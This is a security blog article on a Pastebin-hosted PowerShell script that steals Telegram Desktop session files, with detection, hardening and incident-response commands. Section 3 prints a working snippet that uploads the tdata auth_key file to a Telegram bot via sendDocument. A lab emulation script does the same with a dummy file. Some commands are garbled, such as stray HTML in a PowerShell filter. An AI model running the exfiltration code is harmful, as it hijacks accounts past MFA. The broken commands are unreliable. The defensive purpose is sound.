Hackers Exploit Pastebin PowerShell Script To Hijack Telegram Sessions – A Deep Dive Into Session Stealer Tactics + Video

Introduction:

Session hijacking attacks have evolved beyond credential theft, with adversaries now targeting application-specific session files that bypass multi-factor authentication. A newly discovered PowerShell script hosted on Pastebin, disguised as “Windows Telemetry Update – Fixed version,” demonstrates how attackers extract Telegram Desktop session data and exfiltrate it via Telegram’s own Bot API, turning the messaging platform against its users. This article dissects the attack chain, provides detection and mitigation steps, and offers hands-on commands for blue teams.

Learning Objectives:

Understand how PowerShell scripts can steal Telegram session files without requiring admin privileges.
Analyze the use of Pastebin as a dead-drop resolver and Telegram Bot API for covert exfiltration.
Implement defensive measures including PowerShell logging, session file permissions, and network-based detection.

You Should Know:

1. Unpacking the Pastebin PowerShell Session Stealer

The attack begins with a malicious PowerShell script uploaded to Pastebin under a deceptive name. The script, once executed (often via a dropper or social engineering), performs the following actions without triggering UAC prompts because it operates entirely within the user’s profile.

Step‑by‑step guide to analyze the script:

Locate the raw Pastebin URL (example format: `https://pastebin.com/raw/xxxxxx`). In this campaign, the attackers used a shortened LinkedIn link, but the raw endpoint can be retrieved via browser dev tools or URL unshorteners.

Download the script safely in an isolated sandbox (Windows Sandbox or any Linux VM with curl):

Windows (PowerShell)
Invoke-WebRequest -Uri "https://pastebin.com/raw/EXAMPLE" -OutFile "telemetry.ps1"

Linux
wget https://pastebin.com/raw/EXAMPLE -O telemetry.ps1

Inspect the script content. Key indicators to look for:
References to `$env:APPDATA\Telegram Desktop\tdata` – the folder containing session files (D877F783D5D3EF8C subfolders with `map` files).
Use of `Telegram.Bot` API – a hardcoded bot token and chat ID for exfiltration.
Invocation of `Invoke-RestMethod` or `WebClient.UploadFile` to send stolen data.

What this does: The script reads binary session files that keep users logged into Telegram Desktop. By copying these files and posting them to a Telegram bot, the attacker can impersonate the victim on any device without needing a password or two‑factor code.

2. Detecting the Attack on Windows Systems

Defenders must monitor for suspicious PowerShell execution, especially scripts downloaded from Pastebin or invoking Telegram-related API endpoints.

Step‑by‑step detection commands:

Enable PowerShell script block logging (via Group Policy or registry):

Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1

Search for recently run scripts that access Telegram folder:

Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Where-Object {$_.Message -match "Telegram Desktop\tdata"}

List processes that have accessed the Telegram session folder:

Use Sysinternals Handle or Process Monitor (procmon)
handle64.exe -a "tdata"

Monitor outbound connections to `api.telegram.org` (Telegram Bot API) from non‑browser processes:

Get-NetTCPConnection | Where-Object {$<em>.RemoteAddress -like "149.154.167." -or $</em>.RemotePort -eq 443} | Select-Object -Property LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess

Then map the process ID to a process name using Get-Process -Id <PID>.

Mitigation: Apply a Windows Defender ASR rule to block PowerShell scripts from accessing user profile folders. Use Set-MpPreference -AttackSurfaceReductionRules_Ids BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 -AttackSurfaceReductionRules_Actions Enabled.

3. Understanding Telegram Session File Structure and Exfiltration

Telegram Desktop stores session authentication data in %APPDATA%\Telegram Desktop\tdata. The critical files are `D877F783D5D3EF8C` (a subfolder named after the user’s dc_id) containing auth_key, map1, and `map2` files. The PowerShell script copies these files, compresses them (often into a ZIP), and sends them via a multipart POST request to the Telegram Bot API.

Step‑by‑step to locate and protect these files:

On Windows, navigate to the folder:

cd %APPDATA%\Telegram Desktop\tdata
dir

On Linux (Telegram Desktop installed via Snap or native package):
```
cd ~/.local/share/TelegramDesktop/tdata
ls -la
```
To prevent unauthorized copying, restrict write/modify permissions for non‑owner processes:
```
Windows (PowerShell as Admin)
$tdata = "$env:APPDATA\Telegram Desktop\tdata"
icacls $tdata /deny "Everyone:(R,W,D)"
```
Caution: This may break Telegram updates or multi‑device sync. Test in a controlled environment.

Exfiltration simulation: A typical PowerShell snippet used by attackers:

$botToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11"
$chatId = "987654321"
$uri = "https://api.telegram.org/bot$botToken/sendDocument"
$file = "$env:APPDATA\Telegram Desktop\tdata\D877F783D5D3EF8C\auth_key"
Invoke-RestMethod -Uri $uri -Method Post -Form @{chat_id=$chatId; document=Get-Item $file}

Defenders should block outbound requests to `api.telegram.org` from endpoints that do not require Telegram connectivity (e.g., corporate servers).

4. Hardening Against Telegram Session Hijacking

Beyond script detection, implement several layers of defense to prevent session theft even if an attacker runs a malicious script.

Step‑by‑step hardening guide:

AppLocker / WDAC: Restrict PowerShell execution to signed scripts only. Deploy a default rule that blocks scripts from `%USERPROFILE%\Downloads` and %TEMP%.
```
Set execution policy for all users
Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope LocalMachine
```
Network segmentation: Use a firewall (Windows Defender Firewall with Advanced Security) to block outbound HTTPS to `api.telegram.org` unless explicitly required. Create an outbound rule:
```
New-NetFirewallRule -DisplayName "Block Telegram Bot API" -Direction Outbound -RemoteAddress 149.154.167.0/24 -Protocol TCP -RemotePort 443 -Action Block
```

Apply Zero Trust principle for session stores: Use Microsoft Defender for Endpoint’s folder access control to protect %APPDATA%\Telegram Desktop. Add the folder to controlled folder access:

Add-MpPreference -ControlledFolderAccessAllowedApplications "C:\Program Files\WindowsApps\Telegram\Telegram.exe"
Add-MpPreference -ControlledFolderAccessProtectedFolders "$env:APPDATA\Telegram Desktop"

Log and alert on PowerShell web requests: Enable PowerShell transcription and forward logs to a SIEM. Search for `Invoke-RestMethod` or `UploadFile` combined with api.telegram.org.

Incident Response: What to Do After Session Theft

If you suspect a Telegram session has been compromised, immediate action is required to revoke the attacker’s access and scan for persistence.

Step‑by‑step response procedures:

Terminate all active Telegram sessions: Open Telegram Desktop → Settings → Devices → “Terminate all other sessions”. Alternatively, use the mobile app: Settings → Privacy and Security → Active Sessions → Terminate All.
Change your Telegram phone number’s associated password (even if 2FA wasn’t enabled) and revoke the bot token used by the attacker. Since you cannot change the token remotely, contact Telegram via `https://t.me/botfather` to revoke the compromised bot.

Scan for the malicious PowerShell script using YARA rules. Example rule snippet:

rule TelegramSessionStealer {
strings:
$bot_token = /[0-9]{5,10}:[A-Za-z0-9_-]{35}/
$tdata = "Telegram Desktop\tdata"
$sendDoc = "sendDocument"
condition:
all of them
}

Check for scheduled tasks or startup entries that re‑download the Pastebin script:

Get-ScheduledTask | Where-Object {$_.Actions -like "powershell"}
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"

6. Proactive Blue Team Exercises: Emulating the Attack

To test your defenses, emulate the Pastebin-based session stealer in a controlled lab environment. This helps validate detection rules and response playbooks.

Step‑by‑step emulation using safe test credentials:

Create a disposable Telegram account and a test bot via BotFather. Obtain a bot token.

Write a minimal PowerShell script (save as test_stealer.ps1) that copies only a dummy file (e.g., a text file) instead of real session data:

$dummyFile = "$env:TEMP\dummy.txt"
"Test session" | Out-File $dummyFile
$botToken = "YOUR_TEST_BOT_TOKEN"
$chatId = "YOUR_TEST_CHAT_ID"
$uri = "https://api.telegram.org/bot$botToken/sendDocument"
Invoke-RestMethod -Uri $uri -Method Post -Form @{chat_id=$chatId; document=Get-Item $dummyFile}

Execute the script on a Windows test VM where PowerShell logging is enabled. Verify that your SIEM captures:
Script block log (Event ID 4104) containing the bot token.
Network connection to `api.telegram.org` (Windows event 5156 for firewall allow).
Run the detection commands from Section 2 to ensure they correctly identify the activity.

What Undercode Say:

Session tokens are the new gold: Attackers bypass MFA by stealing local session files. This Pastebin campaign highlights a low‑skill, high‑impact technique that every blue team must address.
Pastebin remains a popular malware distribution channel despite its age. Organizations should block `pastebin.com` in proxy filters or at the DNS level unless required for legitimate research.

The use of Telegram’s own Bot API for exfiltration is clever because it blends with normal Telegram traffic, evading many egress filters. Defenders must move beyond signature‑based detection to behavioral analytics—watching for scripts that read browser or messaging app data folders and then initiate web requests. Regular rotation of session tokens (though not natively supported by Telegram) can be enforced by forcing users to log out periodically and educating them on the risks of “remember me” features on shared workstations.

Prediction:

As session hijacking tools become commoditized, we will see a surge in Pastebin‑like platforms (e.g., GitHub Gists, GitLab snippets) being used for modular, cloud‑hosted attack scripts. Telegram’s Bot API may face increased abuse, prompting the platform to introduce rate limiting or requiring bot tokens to be bound to specific IP addresses. Organizations will accelerate adoption of EDR solutions that can roll back session file modifications and implement “credential guard” for non‑Windows applications. Within six months, expect proof‑of‑concept tools that automate session extraction from multiple messaging apps (Signal, Slack, Discord) using identical techniques.

▶️ Related Video (74% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Mayura Kathiresh – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Listen to this Post